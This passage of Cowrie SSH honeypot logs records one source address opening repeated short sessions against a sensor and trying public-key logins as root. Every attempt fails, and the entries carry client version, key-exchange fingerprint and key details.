rt-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T12:19:38.112199Z","src_ip":"212.227.235.229","session":"48bb71a003d3"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-08-26T12:19:38.517810Z","src_ip":"212.227.235.229","session":"48bb71a003d3"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T12:19:38.519479Z","src_ip":"212.227.235.229","session":"48bb71a003d3"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"3a:2d:90:7f:db:51:ac:5b:99:5c:30:41:9b:50:60:e6","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC5Nt1BKYKiIrQtwJr1aNgczUzEykIW1/GPIslxUqW6nhRXhqS4+er4PXDg8m8jvsNhbocnhA5J52B1yzB5DJE0xeog/AWhw82CmHaTdP0UWaxxsGmw22lxqWpT+KuLQ210s8jhXVE6KyXAm+aYPGSZIefPW7FphSTsEi/+wv5lzGfdi5VvcZboChKkpxEzpZ2uBl5vaMKKdZUMjy0rr03pb1bmD9JBBcMvEK6yN3wLbfsiDUOWLULbkKHi2C3L39D/z2y1ZOpGlFMinAANUCBt8RCDr0BCrR9AwIsbJS8IRft7/8Y3dK4q8ZU799wv4GUt7Amz2dIiC1nvp0nzp8s5","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 3a:2d:90:7f:db:51:ac:5b:99:5c:30:41:9b:50:60:e6","sensor":"my-vps","timestamp":"2025-08-26T12:19:38.722855Z","src_ip":"212.227.235.229","session":"48bb71a003d3"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"3a:2d:90:7f:db:51:ac:5b:99:5c:30:41:9b:50:60:e6","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC5Nt1BKYKiIrQtwJr1aNgczUzEykIW1/GPIslxUqW6nhRXhqS4+er4PXDg8m8jvsNhbocnhA5J52B1yzB5DJE0xeog/AWhw82CmHaTdP0UWaxxsGmw22lxqWpT+KuLQ210s8jhXVE6KyXAm+aYPGSZIefPW7FphSTsEi/+wv5lzGfdi5VvcZboChKkpxEzpZ2uBl5vaMKKdZUMjy0rr03pb1bmD9JBBcMvEK6yN3wLbfsiDUOWLULbkKHi2C3L39D/z2y1ZOpGlFMinAANUCBt8RCDr0BCrR9AwIsbJS8IRft7/8Y3dK4q8ZU799wv4GUt7Amz2dIiC1nvp0nzp8s5","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T12:19:38.723507Z","src_ip":"212.227.235.229","session":"48bb71a003d3"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:19:38.926072Z","src_ip":"212.227.235.229","session":"48bb71a003d3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51784,"dst_ip":"1.2.3.4","dst_port":22,"session":"a057bd3f9e51","protocol":"ssh","message":"New connection: 212.227.235.229:51784 (1.2.3.4:22) [session: a057bd3f9e51]","sensor":"my-vps","timestamp":"2025-08-26T12:19:39.132652Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9p19","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9p19","sensor":"my-vps","timestamp":"2025-08-26T12:19:39.133329Z","src_ip":"212.227.235.229","session":"a057bd3f9e51"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T12:19:39.341878Z","src_ip":"212.227.235.229","session":"a057bd3f9e51"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-08-26T12:19:39.759046Z","src_ip":"212.227.235.229","session":"a057bd3f9e51"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T12:19:39.759690Z","src_ip":"212.227.235.229","session":"a057bd3f9e51"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"23:c8:64:09:84:20:35:9f:76:8a:09:2d:8b:cf:48:33","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDTpdG+f24ZLGM1XY2PTbBvm+Xqqf9ryjietrZ8ZznOo3IoqOzjPmdNJugKYS4Qaom1HCOTQdLzxTYKwlNUSe6lvcyirfQzgzBUsh4dCQ42oILJMsEFp2gwiqx/MnT5w+gITwsHFovX/Sm6RzxNRokQST9vduiHEZ3ytfiFolrPIu9ZLkWm/2fgvaAhu8Z6hAhpObjitg44rkG2QI2gdIiMSF2bMmErzZHD471e2Yl8ryEpzHX731db7CSL/3v5qUR1FRAXcovO4lVL0EMfE0NE6MV4TVoAQaWtAo4WuIEVzAPXHA/KezhX92V8WhG7Zt1Nto2rQvTY04lJuUDZNr5t","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 23:c8:64:09:84:20:35:9f:76:8a:09:2d:8b:cf:48:33","sensor":"my-vps","timestamp":"2025-08-26T12:19:39.968031Z","src_ip":"212.227.235.229","session":"a057bd3f9e51"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"23:c8:64:09:84:20:35:9f:76:8a:09:2d:8b:cf:48:33","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDTpdG+f24ZLGM1XY2PTbBvm+Xqqf9ryjietrZ8ZznOo3IoqOzjPmdNJugKYS4Qaom1HCOTQdLzxTYKwlNUSe6lvcyirfQzgzBUsh4dCQ42oILJMsEFp2gwiqx/MnT5w+gITwsHFovX/Sm6RzxNRokQST9vduiHEZ3ytfiFolrPIu9ZLkWm/2fgvaAhu8Z6hAhpObjitg44rkG2QI2gdIiMSF2bMmErzZHD471e2Yl8ryEpzHX731db7CSL/3v5qUR1FRAXcovO4lVL0EMfE0NE6MV4TVoAQaWtAo4WuIEVzAPXHA/KezhX92V8WhG7Zt1Nto2rQvTY04lJuUDZNr5t","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T12:19:39.968683Z","src_ip":"212.227.235.229","session":"a057bd3f9e51"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:19:40.176699Z","src_ip":"212.227.235.229","session":"a057bd3f9e51"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51786,"dst_ip":"1.2.3.4","dst_port":22,"session":"8de606d8a3ee","protocol":"ssh","message":"New connection: 212.227.235.229:51786 (1.2.3.4:22) [session: 8de606d8a3ee]","sensor":"my-vps","timestamp":"2025-08-26T12:19:40.377766Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9p19","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9p19","sensor":"my-vps","timestamp":"2025-08-26T12:19:40.378631Z","src_ip":"212.227.235.229","session":"8de606d8a3ee"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T12:19:40.580738Z","src_ip":"212.227.235.229","session":"8de606d8a3ee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46148,"dst_ip":"1.2.3.4","dst_port":22,"session":"45b504bc97e5","protocol":"ssh","message":"New connection: 212.227.235.229:46148 (1.2.3.4:22) [session: 45b504bc97e5]","sensor":"my-vps","timestamp":"2025-08-26T12:19:40.709349Z"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-08-26T12:19:40.986762Z","src_ip":"212.227.235.229","session":"8de606d8a3ee"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T12:19:40.987362Z","src_ip":"212.227.235.229","session":"8de606d8a3ee"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"5c:45:e7:63:ce:fe:93:51:65:22:a2:1a:51:76:0e:1a","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDevQyCt06VKbdFcD680JVyiFncqdLKD9/oepOO8uwrSl2+feESHRtXEVFKzm8ew5722I8ap8uxjf3DmVvdvVgv1FSToxY3QREPRcxvSyve3Vj74E8cTeYVhfVeYxUf3e0XXofo/c5xvkpK34OxO5bqteZLTBc5bZaIL1mwgmU/tl5yK5Ut6BfupCicYLxGZOMy/qpNIaJn/64gLW3sHI4ZLwqa6RU7rD56lUroxQAJ7Ysf2aAUSFxtG35+qvt3N/NwXiq8RNPURuRj+M6PYnng0dHyD629ytH5kxCM2DKRxLDPEnMociRRN2Hhs/8MN37U9N3hgmf5fUb7osvUdBcus+r6Vxn22eQo5Bgp+8APDDDoDauTNOIU/AOkphJkMEfJYgeunAnfZbnMwOqVJF5yvkzjqF6v05jWL4hAvY+dpjsrtihOT+UV/MyFE6KcN87ZQNJPCBCiWxKZqycO0tTmqn1pGmza7UEi+VBmt9SNq+z8ULHa9L+wL9SKtdIO5TTPeNXAyyb9mDQNoNiS2rJPNqLV6BIbepwlmqq8ME9IC3TVQVOo4TwQv2Ioujra1VIxf18wUBhNG1zDjEd5q59TVJ/rP7H6bIjbDZ/YgGKPYZGAOdHhDGUmfLToxbWbCwbPKwJYJzZfUiNEVsxIBW1BvhjgvLM4g/okjkMTzEZ9Zw==","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 5c:45:e7:63:ce:fe:93:51:65:22:a2:1a:51:76:0e:1a","sensor":"my-vps","timestamp":"2025-08-26T12:19:41.190243Z","src_ip":"212.227.235.229","session":"8de606d8a3ee"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"5c:45:e7:63:ce:fe:93:51:65:22:a2:1a:51:76:0e:1a","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDevQyCt06VKbdFcD680JVyiFncqdLKD9/oepOO8uwrSl2+feESHRtXEVFKzm8ew5722I8ap8uxjf3DmVvdvVgv1FSToxY3QREPRcxvSyve3Vj74E8cTeYVhfVeYxUf3e0XXofo/c5xvkpK34OxO5bqteZLTBc5bZaIL1mwgmU/tl5yK5Ut6BfupCicYLxGZOMy/qpNIaJn/64gLW3sHI4ZLwqa6RU7rD56lUroxQAJ7Ysf2aAUSFxtG35+qvt3N/NwXiq8RNPURuRj+M6PYnng0dHyD629ytH5kxCM2DKRxLDPEnMociRRN2Hhs/8MN37U9N3hgmf5fUb7osvUdBcus+r6Vxn22eQo5Bgp+8APDDDoDauTNOIU/AOkphJkMEfJYgeunAnfZbnMwOqVJF5yvkzjqF6v05jWL4hAvY+dpjsrtihOT+UV/MyFE6KcN87ZQNJPCBCiWxKZqycO0tTmqn1pGmza7UEi+VBmt9SNq+z8ULHa9L+wL9SKtdIO5TTPeNXAyyb9mDQNoNiS2rJPNqLV6BIbepwlmqq8ME9IC3TVQVOo4TwQv2Ioujra1VIxf18wUBhNG1zDjEd5q59TVJ/rP7H6bIjbDZ/YgGKPYZGAOdHhDGUmfLToxbWbCwbPKwJYJzZfUiNEVsxIBW1BvhjgvLM4g/okjkMTzEZ9Zw==","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T12:19:41.190886Z","src_ip":"212.227.235.229","session":"8de606d8a3ee"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:19:41.393384Z","src_ip":"212.227.235.229","session":"8de606d8a3ee"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:19:41.577188Z","src_ip":"212.227.235.229","session":"45b504bc97e5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:19:41.578394Z","src_ip":"212.227.235.229","session":"45b504bc97e5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51800,"dst_ip":"1.2.3.4","dst_port":22,"session":"8be2f78e9e24","protocol":"ssh","message":"New connection: 212.227.235.229:51800 (1.2.3.4:22) [session: 8be2f78e9e24]","sensor":"my-vps","timestamp":"2025-08-26T12:19:41.594022Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9p19","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9p19","sensor":"my-vps","timestamp":"2025-08-26T12:19:41.594861Z","src_ip":"212.227.235.229","session":"8be2f78e9e24"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T12:19:41.796131Z","src_ip":"212.227.235.229","session":"8be2f78e9e24"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-08-26T12:19:42.203769Z","src_ip":"212.227.235.229","session":"8be2f78e9e24"}
